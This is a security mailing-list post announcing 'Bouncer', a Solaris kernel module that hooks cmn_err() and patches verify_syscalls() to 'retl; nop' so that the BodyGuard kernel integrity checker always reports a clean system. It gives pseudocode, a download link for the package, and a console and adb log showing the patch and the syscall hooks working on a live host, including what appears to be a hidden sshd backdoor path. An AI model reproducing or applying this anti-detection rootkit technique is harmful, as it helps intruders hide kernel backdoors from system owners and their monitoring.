Re: UnBodyGuard a.k.a Bouncer (Solaris kernel function hijacking) (fwd)

[noir sin <noir () olympos org>]

apoligies for replying my own mail but i must say; i have sucessfully
developed what i was talking about below... also fix an alignment issue
that leads to a crash in some rare cases.

you can download the new package from:

http://gsu.linux.org.tr/~noir/b.tar.gz

> primary_inhouse_kernel_function_used_by_bodyguard()
> {
>       .....
> if(kobj_getsymvalue(verify_syscalls,1)){
>       do page protection manipulation
>       patch the proper place with "return TRUE" of the verify_syscalls()
>       !! this will make verify_syscalls return TRUE meaning no problems
>       }
> ....
>       do the realstuff ...
> }
>
> this will render any kernel integrity level checker useless. solution
> is simple integrity checkers have to be stealh to like their counterparts
> (backdoors)

here is how things are:
bouncer hooks cmn_err()* and checks if verify_syscalls() resolvs, if YES
it patches the first 2 instructions of verify_syscalls with "retl; nop;

* cmn_err() is used for reporting to userland (through /var/adm/messages)
so at _init() bodyguard call cmn_err() to report of its
successful installation, nada!  bouncer kicks in and patches
verify_syscall() ...
;0)

now you can even change the sysent/sysent32 table with no worries ; )
logs of BOUNCER in action:

bash-2.03# uname -a
SunOS slint 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
bash-2.03# isainfo -b
64
bash-2.03# cd BOUNCER/
bash-2.03# modload b2
bash-2.03#
bash-2.03# /usr/local/sbin/sshd
bash: /usr/lib/.funky/sshd: No such file or directory
bash-2.03# cd ../BODYGUARD
bash-2.03# sh runbodyguard_verifier.sh
This is the license for BodyGuard Kernel Verifier, Demo Version 1.0

.....
Jul  7 04:45:50 slint bodyguard: [ID 801043 kern.notice] NOTICE:
Installing Immunity BODYGUARD module!
Jul  7 04:45:50 slint bodyguard: [ID 300378 kern.notice] NOTICE: If there
are any problems, please e-mail Dave Aitel at dave () immunitysec com
Jul  7 04:45:50 slint bodyguard: [ID 779008 kern.notice] NOTICE: This is
just a demo version of the Immunity BODYGUARD product.
Jul  7 04:45:50 slint bodyguard: [ID 530759 kern.notice] NOTICE: For a
year-long site license, or limited source code license, please see
http://www.immunitysec.com.
Jul  7 04:45:50 slint bodyguard: [ID 222896 kern.notice] NOTICE: Done
installing BODYGUARD.
Jul  7 04:45:51 slint bodyguard: [ID 887483 kern.notice] NOTICE: Removing
BODYGUARD module!
Jul  7 05:01:22 slint bodyguard: [ID 801043 kern.notice] NOTICE:
Installing Immunity BODYGUARD module!
Jul  7 05:01:22 slint bodyguard: [ID 300378 kern.notice] NOTICE: If there
are any problems, please e-mail Dave Aitel at dave () immunitysec com
Jul  7 05:01:22 slint bodyguard: [ID 779008 kern.notice] NOTICE: This is
just a demo version of the Immunity BODYGUARD product.

bash-2.03# modload bodyguard
bash-2.03# adb -k /dev/ksyms
physmem 3b5b
verify_syscalls/i
verify_syscalls:
verify_syscalls:                retl

verify_syscalls+4:              nop

cmn_err+0x94/i
cmn_err+0x94:   call    uncle_steve_albini

exece+0xc/i
exece+0xc:      call    hook_execcommon

later,
noir